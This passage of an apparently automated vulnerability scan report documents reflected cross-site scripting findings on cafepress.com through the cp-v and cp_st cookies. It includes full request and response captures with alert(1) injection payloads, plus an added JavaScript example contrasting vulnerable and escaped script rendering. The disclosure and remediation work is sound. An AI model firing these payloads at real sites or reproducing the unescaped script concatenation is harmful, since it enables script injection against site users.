Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=91e0a</script><script>alert(1)</script>2ef0362a154; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59583
Date: Sun, 26 Dec 2010 13:47:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/
Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '91e0a</script><script>alert(1)</script>2ef0362a154'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...
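Findings 1.16 and 1.17 (and their repeats against the other category paths in 1.18 through 1.22) are one defect with two quoting styles: the cp-v value lands inside the double-quoted s.eVar30 string in the Omniture block, and the cp_st value lands inside the single-quoted searchTerm string in the tealeaf block. The </script> payload against cp_st fires even though the value sits inside a quoted JavaScript string, because the HTML tokenizer closes the script element at the first "</script" it meets before the JavaScript parser ever sees the string; escaping quotes alone therefore does not close that sink. The block below is an added example, not code from the XSS.CX report or from CafePress. It models both sinks as the captured responses show them, a hardened renderer that emits a JSON string literal with <, >, & and U+2028/U+2029 escaped, and a small check that mimics the browser's script-splitting and per-block execution so the payloads from the report can be shown firing against raw concatenation and not against the encoded output. The visitor hash and object names are copied from the responses above; the function names and the execution model are illustrative.

```javascript
// Added example (not from the XSS.CX report or CafePress): the two script-string
// sinks of findings 1.16 / 1.17, a hardened encoder, and a browser-like check.

// Vulnerable rendering: cookie values concatenated straight into inline script,
// the shape the report's responses show.
//   1.16: s.eVar30 = "<visitor hash>:<cp-v>";                 (double quotes)
//   1.17: window.cafepress.tealeaf.searchTerm = '<cp_st>';    (single quotes)
function renderScriptVulnerable(cpV, cpSt) {
  return (
    '<script>\n' +
    's.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:' + cpV + '";\n' +
    "window.cafepress.tealeaf.searchTerm = '" + cpSt + "';\n" +
    '</script>'
  );
}

// JSON.stringify produces a valid JS string literal (quotes, backslashes and
// control characters escaped). The extra replacements cover what still matters
// inside an inline <script>: '<' and '>' so "</script>" can never end the element
// early, '&' because the page is served as XHTML 1.0 Strict, and U+2028/U+2029,
// which pre-ES2019 engines treat as line terminators inside a string literal.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened rendering of the same two assignments.
function renderScriptHardened(cpV, cpSt) {
  return (
    '<script>\n' +
    's.eVar30 = ' + jsStringLiteral('A8D8655B7B25F13535D4E6E67BEC27E9:' + cpV) + ';\n' +
    'window.cafepress.tealeaf.searchTerm = ' + jsStringLiteral(cpSt) + ';\n' +
    '</script>'
  );
}

// Minimal model of the browser (illustrative, not a real HTML parser): the
// tokenizer ends a script element at the first "</script" regardless of JS
// quoting, then each script body is compiled and run in order. A body that
// fails to compile (e.g. an unterminated string) is skipped; later bodies run.
// alert() is stubbed so the check can count how often a payload executes.
function runInlineScripts(markup) {
  const env = { scripts: 0, alerts: 0, s: {}, window: { cafepress: { tealeaf: {} } } };
  const alert = () => { env.alerts += 1; };
  const re = /<script>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(markup)) !== null) {
    env.scripts += 1;
    try {
      new Function('alert', 's', 'window', m[1])(alert, env.s, env.window);
    } catch (e) {
      if (!(e instanceof SyntaxError)) throw e; // browser: broken block does nothing
    }
  }
  return env;
}

// Payloads exactly as submitted in findings 1.16 and 1.17.
const CP_V_PAYLOAD = 'D0026F27AADDAF9A26C54608326FC1BA4ab65"-alert(1)-"48e2c7462b';
const CP_ST_PAYLOAD = '91e0a</script><script>alert(1)</script>2ef0362a154';

// Summary for the reader: how many script elements the tokenizer sees and how
// many times the payload ran, for each rendering.
function demonstrate() {
  const v116 = runInlineScripts(renderScriptVulnerable(CP_V_PAYLOAD, ''));
  const v117 = runInlineScripts(renderScriptVulnerable('D0026F27AADDAF9A26C54608326FC1BA', CP_ST_PAYLOAD));
  const hard = runInlineScripts(renderScriptHardened(CP_V_PAYLOAD, CP_ST_PAYLOAD));
  return {
    vulnerable_1_16: { scripts: v116.scripts, alerts: v116.alerts },
    vulnerable_1_17: { scripts: v117.scripts, alerts: v117.alerts },
    hardened: { scripts: hard.scripts, alerts: hard.alerts,
                searchTermRoundTrips: hard.window.cafepress.tealeaf.searchTerm === CP_ST_PAYLOAD },
  };
}
```

The hardened renderer keeps the assignments where they are but makes the embedded value inert in both parsers: the HTML tokenizer never sees a literal "</script", and the JavaScript parser sees one well-formed string literal whose value round-trips to the original cookie contents. The cleaner fix the report's remediation text points to is to not emit user-controlled data into script at all, for example by placing it in a data attribute (HTML-attribute encoded) and reading it from script at run time.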

1.18. http://www.cafepress.com/+boxers [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+boxers

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload baa43"-alert(1)-"4cc6f92795 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+boxers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAbaa43"-alert(1)-"4cc6f92795; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59461
Date: Sun, 26 Dec 2010 13:47:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/
Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAbaa43"-alert(1)-"4cc6f92795";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.19. http://www.cafepress.com/+boxers [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+boxers

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6727</script><script>alert(1)</script>52729b93123 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+boxers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d6727</script><script>alert(1)</script>52729b93123; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 59479
Date: Sun, 26 Dec 2010 13:47:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/
Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'd6727</script><script>alert(1)</script>52729b93123'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.20. http://www.cafepress.com/+bumper-stickers [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+bumper-stickers

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 350cc"-alert(1)-"5204568fc11 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+bumper-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA350cc"-alert(1)-"5204568fc11; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 59754
Date: Sun, 26 Dec 2010 13:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:56 GMT; path=/
Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:56 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA350cc"-alert(1)-"5204568fc11";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.21. http://www.cafepress.com/+bumper-stickers [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+bumper-stickers

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 144cb</script><script>alert(1)</script>4632a294b1c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+bumper-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=144cb</script><script>alert(1)</script>4632a294b1c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59771
Date: Sun, 26 Dec 2010 13:48:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/
